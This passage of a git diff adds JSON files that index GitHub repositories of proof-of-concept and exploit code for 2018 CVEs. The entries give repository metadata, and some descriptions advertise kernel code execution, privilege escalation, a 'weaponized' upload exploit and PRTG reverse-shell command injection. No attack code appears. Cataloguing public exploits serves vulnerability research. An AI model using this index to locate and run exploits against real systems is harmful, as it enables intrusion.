"https:\/\/github.com\/Sunqiz\/CVE-2018-8587-reproduction", + "description": "CVE-2018-8587复现", + "fork": false, + "created_at": "2022-10-10T05:57:17Z", + "updated_at": "2022-10-11T02:14:22Z", + "pushed_at": "2022-10-10T05:57:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8611.json b/2018/CVE-2018-8611.json new file mode 100644 index 0000000000..df9e079ac2 --- /dev/null +++ b/2018/CVE-2018-8611.json @@ -0,0 +1,33 @@ +[ + { + "id": 362096234, + "name": "CVE-2018-8611", + "full_name": "lsw29475\/CVE-2018-8611", + "owner": { + "login": "lsw29475", + "id": 13043359, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13043359?v=4", + "html_url": "https:\/\/github.com\/lsw29475", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsw29475\/CVE-2018-8611", + "description": null, + "fork": false, + "created_at": "2021-04-27T12:00:24Z", + "updated_at": "2024-07-03T06:05:14Z", + "pushed_at": "2021-04-30T02:27:52Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8617.json b/2018/CVE-2018-8617.json new file mode 100644 index 0000000000..0ef777cdf3 --- /dev/null +++ b/2018/CVE-2018-8617.json @@ -0,0 +1,33 @@ +[ + { + "id": 729736644, + "name": "cve-2018-8617-aab-r-w-", + "full_name": "bb33bb\/cve-2018-8617-aab-r-w-", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/cve-2018-8617-aab-r-w-", + "description": null, + "fork": false, + "created_at": "2023-12-10T07:23:12Z", + "updated_at": "2023-12-10T07:23:12Z", + "pushed_at": "2023-12-09T22:25:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8639.json b/2018/CVE-2018-8639.json new file mode 100644 index 0000000000..85e468f59c --- /dev/null +++ b/2018/CVE-2018-8639.json @@ -0,0 +1,64 @@ +[ + { + "id": 173959963, + "name": "CVE-2018-8639-exp", + "full_name": "ze0r\/CVE-2018-8639-exp", + "owner": { + "login": "ze0r", + "id": 43227253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43227253?v=4", + "html_url": "https:\/\/github.com\/ze0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ze0r\/CVE-2018-8639-exp", + "description": null, + "fork": false, + "created_at": "2019-03-05T14:18:07Z", + "updated_at": "2024-08-12T19:46:23Z", + "pushed_at": "2019-04-08T08:26:26Z", + "stargazers_count": 127, + "watchers_count": 127, + "has_discussions": false, + "forks_count": 52, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 52, + "watchers": 127, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 230396639, + "name": "CVE-2018-8639-EXP", + "full_name": "timwhitez\/CVE-2018-8639-EXP", + "owner": { + "login": "timwhitez", + "id": 36320909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36320909?v=4", + "html_url": "https:\/\/github.com\/timwhitez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/timwhitez\/CVE-2018-8639-EXP", + "description": "CVE-2018-8639-EXP", + "fork": false, + "created_at": "2019-12-27T07:39:07Z", + "updated_at": "2021-04-21T07:02:51Z", + "pushed_at": "2021-03-26T04:34:51Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8718.json b/2018/CVE-2018-8718.json new file mode 100644 index 0000000000..e69ffd9a01 --- /dev/null +++ b/2018/CVE-2018-8718.json @@ -0,0 +1,33 @@ +[ + { + "id": 191192516, + "name": "CVE-2018-8718", + "full_name": "GeunSam2\/CVE-2018-8718", + "owner": { + "login": "GeunSam2", + "id": 41275199, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41275199?v=4", + "html_url": "https:\/\/github.com\/GeunSam2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GeunSam2\/CVE-2018-8718", + "description": "POC of CVE-2018-8718 + tool", + "fork": false, + "created_at": "2019-06-10T15:16:41Z", + "updated_at": "2019-06-10T15:18:25Z", + "pushed_at": "2019-06-10T15:17:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8820.json b/2018/CVE-2018-8820.json new file mode 100644 index 0000000000..55e797223a --- /dev/null +++ b/2018/CVE-2018-8820.json @@ -0,0 +1,33 @@ +[ + { + "id": 127013387, + "name": "frevvomapexec", + "full_name": "hateshape\/frevvomapexec", + "owner": { + "login": "hateshape", + "id": 31131951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31131951?v=4", + "html_url": "https:\/\/github.com\/hateshape", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hateshape\/frevvomapexec", + "description": " PoC Exploit for CVE-2018-8820", + "fork": false, + "created_at": "2018-03-27T16:09:46Z", + "updated_at": "2019-01-29T17:35:37Z", + "pushed_at": "2018-03-27T17:00:14Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8897.json b/2018/CVE-2018-8897.json new file mode 100644 index 0000000000..4885675605 --- /dev/null +++ b/2018/CVE-2018-8897.json @@ -0,0 +1,126 @@ +[ + { + "id": 132952646, + "name": "CVE-2018-8897", + "full_name": "nmulasmajic\/CVE-2018-8897", + "owner": { + "login": "nmulasmajic", + "id": 30013958, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30013958?v=4", + "html_url": "https:\/\/github.com\/nmulasmajic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nmulasmajic\/CVE-2018-8897", + "description": "Implements the POP\/MOV SS (CVE-2018-8897) vulnerability by bugchecking the machine (local DoS). ", + "fork": false, + "created_at": "2018-05-10T20:46:30Z", + "updated_at": "2024-01-04T16:22:57Z", + "pushed_at": "2018-05-10T20:47:59Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 74, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 133221173, + "name": "pop-mov-ss-exploit", + "full_name": "jiazhang0\/pop-mov-ss-exploit", + "owner": { + "login": "jiazhang0", + "id": 10241344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10241344?v=4", + "html_url": "https:\/\/github.com\/jiazhang0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiazhang0\/pop-mov-ss-exploit", + "description": "The exploitation for CVE-2018-8897", + "fork": false, + "created_at": "2018-05-13T09:05:07Z", + "updated_at": "2021-02-23T17:18:57Z", + "pushed_at": "2018-05-16T14:15:19Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 133268202, + "name": "CVE-2018-8897", + "full_name": "can1357\/CVE-2018-8897", + "owner": { + "login": "can1357", + "id": 11807264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11807264?v=4", + "html_url": "https:\/\/github.com\/can1357", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/can1357\/CVE-2018-8897", + "description": "Arbitrary code execution with kernel privileges using CVE-2018-8897.", + "fork": false, + "created_at": "2018-05-13T19:34:17Z", + "updated_at": "2024-11-05T14:50:43Z", + "pushed_at": "2018-05-18T12:26:53Z", + "stargazers_count": 411, + "watchers_count": 411, + "has_discussions": false, + "forks_count": 112, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 112, + "watchers": 411, + "score": 0, + "subscribers_count": 16 + }, + { + "id": 144062105, + "name": "syscall_exploit_CVE-2018-8897", + "full_name": "nmulasmajic\/syscall_exploit_CVE-2018-8897", + "owner": { + "login": "nmulasmajic", + "id": 30013958, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30013958?v=4", + "html_url": "https:\/\/github.com\/nmulasmajic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nmulasmajic\/syscall_exploit_CVE-2018-8897", + "description": "Implements the POP\/MOV SS (CVE-2018-8897) vulnerability by leveraging SYSCALL to perform a local privilege escalation (LPE).", + "fork": false, + "created_at": "2018-08-08T20:04:56Z", + "updated_at": "2024-09-05T04:50:28Z", + "pushed_at": "2018-08-08T20:12:20Z", + "stargazers_count": 116, + "watchers_count": 116, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 116, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8941.json b/2018/CVE-2018-8941.json new file mode 100644 index 0000000000..8109ee5c7c --- /dev/null +++ b/2018/CVE-2018-8941.json @@ -0,0 +1,33 @@ +[ + { + "id": 127970329, + "name": "CVE-2018-8941", + "full_name": "SECFORCE\/CVE-2018-8941", + "owner": { + "login": "SECFORCE", + "id": 8157384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2018-8941", + "description": "D-Link DSL-3782 Code Execution (Proof of Concept)", + "fork": false, + "created_at": "2018-04-03T21:22:34Z", + "updated_at": "2024-10-16T21:18:15Z", + "pushed_at": "2018-04-03T21:59:31Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8947.json b/2018/CVE-2018-8947.json new file mode 100644 index 0000000000..44b05b7a35 --- /dev/null +++ b/2018/CVE-2018-8947.json @@ -0,0 +1,33 @@ +[ + { + "id": 422620568, + "name": "CVE-2018-8947", + "full_name": "scopion\/CVE-2018-8947", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/CVE-2018-8947", + "description": null, + "fork": false, + "created_at": "2021-10-29T15:12:35Z", + "updated_at": "2021-10-29T15:13:10Z", + "pushed_at": "2021-10-29T15:13:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-8970.json b/2018/CVE-2018-8970.json new file mode 100644 index 0000000000..b0e068205f --- /dev/null +++ b/2018/CVE-2018-8970.json @@ -0,0 +1,33 @@ +[ + { + "id": 126690207, + "name": "CVE-2018-8970", + "full_name": "tiran\/CVE-2018-8970", + "owner": { + "login": "tiran", + "id": 444071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/444071?v=4", + "html_url": "https:\/\/github.com\/tiran", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tiran\/CVE-2018-8970", + "description": "Demo for https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-8970", + "fork": false, + "created_at": "2018-03-25T11:22:47Z", + "updated_at": "2018-04-10T15:41:19Z", + "pushed_at": "2018-03-25T11:23:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9059.json b/2018/CVE-2018-9059.json new file mode 100644 index 0000000000..673a78551d --- /dev/null +++ b/2018/CVE-2018-9059.json @@ -0,0 +1,33 @@ +[ + { + "id": 134121800, + "name": "easy-file-share-7.2-exploit-CVE-2018-9059", + "full_name": "manojcode\/easy-file-share-7.2-exploit-CVE-2018-9059", + "owner": { + "login": "manojcode", + "id": 17510282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17510282?v=4", + "html_url": "https:\/\/github.com\/manojcode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manojcode\/easy-file-share-7.2-exploit-CVE-2018-9059", + "description": "My version - Easy File Sharing Web Server 7.2 - 'UserID' - Win 7 'DEP' bypass ", + "fork": false, + "created_at": "2018-05-20T05:13:25Z", + "updated_at": "2018-05-21T06:49:16Z", + "pushed_at": "2018-05-21T06:49:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9075.json b/2018/CVE-2018-9075.json new file mode 100644 index 0000000000..f5faf54e81 --- /dev/null +++ b/2018/CVE-2018-9075.json @@ -0,0 +1,33 @@ +[ + { + "id": 150627369, + "name": "cve-2018-9075", + "full_name": "beverlymiller818\/cve-2018-9075", + "owner": { + "login": "beverlymiller818", + "id": 43651541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43651541?v=4", + "html_url": "https:\/\/github.com\/beverlymiller818", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/beverlymiller818\/cve-2018-9075", + "description": null, + "fork": false, + "created_at": "2018-09-27T17:58:00Z", + "updated_at": "2018-09-27T19:26:57Z", + "pushed_at": "2018-09-27T19:27:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9160.json b/2018/CVE-2018-9160.json new file mode 100644 index 0000000000..56e7b46122 --- /dev/null +++ b/2018/CVE-2018-9160.json @@ -0,0 +1,33 @@ +[ + { + "id": 131106110, + "name": "sickrageWTF", + "full_name": "mechanico\/sickrageWTF", + "owner": { + "login": "mechanico", + "id": 32109749, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32109749?v=4", + "html_url": "https:\/\/github.com\/mechanico", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mechanico\/sickrageWTF", + "description": "CVE-2018-9160", + "fork": false, + "created_at": "2018-04-26T05:49:09Z", + "updated_at": "2018-04-26T06:38:11Z", + "pushed_at": "2018-04-26T06:38:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9206.json b/2018/CVE-2018-9206.json new file mode 100644 index 0000000000..7de4909d73 --- /dev/null +++ b/2018/CVE-2018-9206.json @@ -0,0 +1,126 @@ +[ + { + "id": 154178141, + "name": "CVE-2018-9206", + "full_name": "Den1al\/CVE-2018-9206", + "owner": { + "login": "Den1al", + "id": 7230603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7230603?v=4", + "html_url": "https:\/\/github.com\/Den1al", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Den1al\/CVE-2018-9206", + "description": "A Python PoC for CVE-2018-9206", + "fork": false, + "created_at": "2018-10-22T16:33:22Z", + "updated_at": "2024-08-12T19:42:37Z", + "pushed_at": "2018-10-22T16:49:08Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 154564555, + "name": "JQShell", + "full_name": "Stahlz\/JQShell", + "owner": { + "login": "Stahlz", + "id": 4689086, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4689086?v=4", + "html_url": "https:\/\/github.com\/Stahlz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stahlz\/JQShell", + "description": "A weaponized version of CVE-2018-9206", + "fork": false, + "created_at": "2018-10-24T20:24:20Z", + "updated_at": "2023-11-28T09:02:06Z", + "pushed_at": "2018-10-30T01:48:42Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 62, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 165319420, + "name": "cve-2018-9206", + "full_name": "cved-sources\/cve-2018-9206", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2018-9206", + "description": "cve-2018-9206", + "fork": false, + "created_at": "2019-01-11T22:23:06Z", + "updated_at": "2021-04-15T21:34:29Z", + "pushed_at": "2021-04-15T21:34:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 359757450, + "name": "CVE-2018-9206", + "full_name": "mi-hood\/CVE-2018-9206", + "owner": { + "login": "mi-hood", + "id": 34086836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34086836?v=4", + "html_url": "https:\/\/github.com\/mi-hood", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mi-hood\/CVE-2018-9206", + "description": "jquery file upload poc", + "fork": false, + "created_at": "2021-04-20T09:25:37Z", + "updated_at": "2021-04-20T09:26:48Z", + "pushed_at": "2021-04-20T09:26:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9207.json b/2018/CVE-2018-9207.json new file mode 100644 index 0000000000..3c307d4ef4 --- /dev/null +++ b/2018/CVE-2018-9207.json @@ -0,0 +1,33 @@ +[ + { + "id": 165325751, + "name": "cve-2018-9207", + "full_name": "cved-sources\/cve-2018-9207", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2018-9207", + "description": "cve-2018-9207", + "fork": false, + "created_at": "2019-01-11T23:34:00Z", + "updated_at": "2021-04-15T21:35:24Z", + "pushed_at": "2021-04-15T21:35:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9208.json b/2018/CVE-2018-9208.json new file mode 100644 index 0000000000..58a71261c9 --- /dev/null +++ b/2018/CVE-2018-9208.json @@ -0,0 +1,33 @@ +[ + { + "id": 165319911, + "name": "cve-2018-9208", + "full_name": "cved-sources\/cve-2018-9208", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2018-9208", + "description": "cve-2018-9208", + "fork": false, + "created_at": "2019-01-11T22:28:36Z", + "updated_at": "2021-04-15T21:36:08Z", + "pushed_at": "2021-04-15T21:36:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9276.json b/2018/CVE-2018-9276.json new file mode 100644 index 0000000000..1b74cb9798 --- /dev/null +++ b/2018/CVE-2018-9276.json @@ -0,0 +1,95 @@ +[ + { + "id": 178663906, + "name": "CVE-2018-9276", + "full_name": "wildkindcc\/CVE-2018-9276", + "owner": { + "login": "wildkindcc", + "id": 25321621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25321621?v=4", + "html_url": "https:\/\/github.com\/wildkindcc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wildkindcc\/CVE-2018-9276", + "description": "CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)", + "fork": false, + "created_at": "2019-03-31T08:51:07Z", + "updated_at": "2024-08-12T19:47:28Z", + "pushed_at": "2020-12-03T11:22:15Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 36, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 326146315, + "name": "CVE-2018-9276", + "full_name": "andyfeili\/CVE-2018-9276", + "owner": { + "login": "andyfeili", + "id": 59521017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59521017?v=4", + "html_url": "https:\/\/github.com\/andyfeili", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andyfeili\/CVE-2018-9276", + "description": null, + "fork": false, + "created_at": "2021-01-02T09:08:42Z", + "updated_at": "2021-01-02T09:09:30Z", + "pushed_at": "2021-01-02T09:09:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 390665639, + "name": "CVE-2018-9276", + "full_name": "alvinsmith-eroad\/CVE-2018-9276", + "owner": { + "login": "alvinsmith-eroad", + "id": 87450568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87450568?v=4", + "html_url": "https:\/\/github.com\/alvinsmith-eroad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alvinsmith-eroad\/CVE-2018-9276", + "description": "CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)", + "fork": false, + "created_at": "2021-07-29T09:08:18Z", + "updated_at": "2021-07-29T09:08:19Z", + "pushed_at": "2021-07-29T04:51:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9375.json b/2018/CVE-2018-9375.json new file mode 100644 index 0000000000..ce61d7e935 --- /dev/null +++ b/2018/CVE-2018-9375.json @@ -0,0 +1,33 @@ +[ + { + "id": 142890302, + "name": "AOSP-ExploitUserDictionary", + "full_name": "IOActive\/AOSP-ExploitUserDictionary", + "owner": { + "login": "IOActive", + "id": 2120351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2120351?v=4", + "html_url": "https:\/\/github.com\/IOActive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IOActive\/AOSP-ExploitUserDictionary", + "description": "PoC Exploit for AOSP UserDictionary Content Provider (CVE-2018-9375)", + "fork": false, + "created_at": "2018-07-30T14:54:34Z", + "updated_at": "2024-08-12T19:40:27Z", + "pushed_at": "2019-03-02T19:49:22Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 21, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9411.json b/2018/CVE-2018-9411.json new file mode 100644 index 0000000000..eb100c0b16 --- /dev/null +++ b/2018/CVE-2018-9411.json @@ -0,0 +1,33 @@ +[ + { + "id": 155439217, + "name": "CVE-2018-9411", + "full_name": "tamirzb\/CVE-2018-9411", + "owner": { + "login": "tamirzb", + "id": 1054209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1054209?v=4", + "html_url": "https:\/\/github.com\/tamirzb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tamirzb\/CVE-2018-9411", + "description": "Exploit code for CVE-2018-9411 for MediaCasService", + "fork": false, + "created_at": "2018-10-30T18:48:20Z", + "updated_at": "2024-02-25T10:49:47Z", + "pushed_at": "2018-10-30T21:51:16Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 52, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9468.json b/2018/CVE-2018-9468.json new file mode 100644 index 0000000000..cd24c4796a --- /dev/null +++ b/2018/CVE-2018-9468.json @@ -0,0 +1,33 @@ +[ + { + "id": 173484330, + "name": "AOSP-DownloadProviderHijacker", + "full_name": "IOActive\/AOSP-DownloadProviderHijacker", + "owner": { + "login": "IOActive", + "id": 2120351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2120351?v=4", + "html_url": "https:\/\/github.com\/IOActive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IOActive\/AOSP-DownloadProviderHijacker", + "description": "PoC Exploiting Permission Bypass in Android's Download Provider (CVE-2018-9468)", + "fork": false, + "created_at": "2019-03-02T18:31:11Z", + "updated_at": "2024-09-25T13:33:26Z", + "pushed_at": "2020-01-15T12:34:10Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 19, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9493.json b/2018/CVE-2018-9493.json new file mode 100644 index 0000000000..e4afffa12d --- /dev/null +++ b/2018/CVE-2018-9493.json @@ -0,0 +1,33 @@ +[ + { + "id": 173484509, + "name": "AOSP-DownloadProviderDbDumper", + "full_name": "IOActive\/AOSP-DownloadProviderDbDumper", + "owner": { + "login": "IOActive", + "id": 2120351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2120351?v=4", + "html_url": "https:\/\/github.com\/IOActive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IOActive\/AOSP-DownloadProviderDbDumper", + "description": "PoC Exploiting SQL Injection in Android's Download Provider (CVE-2018-9493)", + "fork": false, + "created_at": "2019-03-02T18:32:55Z", + "updated_at": "2024-08-12T19:46:17Z", + "pushed_at": "2020-01-15T12:33:07Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9539.json b/2018/CVE-2018-9539.json new file mode 100644 index 0000000000..5c5ed37ce6 --- /dev/null +++ 